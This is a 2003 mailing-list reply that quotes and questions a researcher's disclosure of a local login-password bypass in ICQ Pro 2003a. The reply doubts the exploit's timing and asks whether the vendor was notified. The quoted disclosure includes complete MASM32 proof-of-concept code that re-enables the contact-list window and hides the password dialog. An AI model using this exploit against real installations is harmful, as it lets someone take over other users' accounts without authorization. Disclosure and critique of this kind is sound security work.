Message of CauЦ Moura Prado at Jul 5 13:30 ... CMP> Software: ICQ 2003a CMP> Threat: Login password can be bypassed locally I maybe missed smth but does it mean ICQ 2003a and other mentioned cache registered user's password regardless of yser's intention or you guys just run your "exploit" just after valid user's session, so that status might be changed back to online just before connection timeout exceeds? I suppose, the latter. As a matter of fact, it still can be considered an exploit, but timing limitations must be documented properly. It's hard to believe you can start ICQ session w/o having UIN's password because server will just refuse to authorize that. And, I'm afraid to ask, you notified vendors before releasing the thing, didn't you? CMP> I have found a vulnerability in ICQ Pro 2003a that CMP> allows anyone to connect to ICQ server using any CMP> account registered locally regardless the 'save CMP> password' option is checked or not. High level CMP> security password is also bypassed! CMP> CMP> How it works? CMP> Simple! You may use EnableWindow API to enable ICQ CMP> contact list window. After enabling the window you can CMP> set your status to online and the UIN will be CMP> connected no matter how high is your security level. CMP> CMP> I've coded a proof-of-concept exploit in July, 02 when CMP> I found the vuln. CMP> The exploit is provided "As is" without warranties. CMP> To compile it you will need MASM32. CMP> CMP> ; ╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚ CMP> ╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚ CMP> ; CUT HERE - CUTE HERE - ca1-icq.asm - CUT CMP> HERE - CUT HERE BOF CMP> ; ----------------------------------------------------- CMP> -------------------- CMP> ; CMP> ; 07/02/2003 - ca1-icq.asm CMP> ; ICQ Password Bypass exploit. CMP> ; written by CauЦ Moura Prado (aka ca1) CMP> ; mouraprado@infoguerra.com.br - ICQ 373313 CMP> ; CMP> ; This exploit allows you to login to ICQ server CMP> using any account registered *locally* CMP> ; no matter the 'save password' option is checked or CMP> not. High level security is also bypassed. CMP> ; All you have to do is run the exploit and set CMP> status property using your mouse when the flower CMP> ; is yellow. If you accidentally set status to CMP> offline then you will need to restart ICQ and run CMP> ; the exploit again. Greets to: Alex Demchenko(aka CMP> Coban), my cousin Rhenan for testing the exploit CMP> ; on his machine and that tiny Israeli company for CMP> starting the whole thing. Oh sure.. hehehe CMP> ; I can't forget... many kisses to those 3 chicks CMP> from my building for being so hot!! ;) CMP> ; CMP> ; CMP> ; uh-oh! CMP> ; ___ CMP> ; __/ \__ CMP> ; / \___/ \ Vulnerable: CMP> ; \__/+ +\__/ ICQ Pro 2003a Build #3800 CMP> ; / ~~~ \ CMP> ; \__/ \__/ Not Vulnerable: CMP> ; \___/ ICQ Lite alpha Build 1211 CMP> ; ICQ 2001b and ICQ 2002a CMP> ; tHe Flaw Power All other versions were not CMP> tested. CMP> ; CMP> coded with masm32 CMP> ; CMP> _______________________________________________________ CMP> ________________________exploit born in .br CMP> CMP> .386 CMP> .model flat, stdcall CMP> option casemap:none CMP> include \masm32\include\user32.inc CMP> include \masm32\include\kernel32.inc CMP> includelib \masm32\lib\user32.lib CMP> includelib \masm32\lib\kernel32.lib CMP> .data CMP> szTextHigh byte 'Password Verification', 0 CMP> szTextLow byte 'Login to server', 0 CMP> szClassName byte '#32770', 0 CMP> .data? CMP> hWndLogin dword ? CMP> .code CMP> _entrypoint: CMP> invoke FindWindow, addr szClassName, addr szTextHigh CMP> mov hWndLogin, eax CMP> .if hWndLogin == 0 CMP> invoke FindWindow, addr szClassName, addr szTextLow CMP> mov hWndLogin, eax CMP> .endif CMP> invoke GetParent, hWndLogin CMP> invoke EnableWindow, eax, 1 ;Enable ICQ contact CMP> list CMP> invoke ShowWindow, hWndLogin, 0 ;get rid of Login CMP> screen (don't kill this window) CMP> invoke ExitProcess, 0 ;uhuu.. cya! i gotta CMP> sleep! CMP> end _entrypoint CMP> CMP> ; ╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚ CMP> ╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚╚ CMP> ; CUT HERE - CUTE HERE - ca1-icq.asm - CUT CMP> HERE - CUT HERE EOF CMP> ; ----------------------------------------------------- CMP> -------------------- CMP> SY, Seva Gluschenko, just stranger on The Road. Demos-Internet NOC | GVS-RIPE | GVS3-RIPN
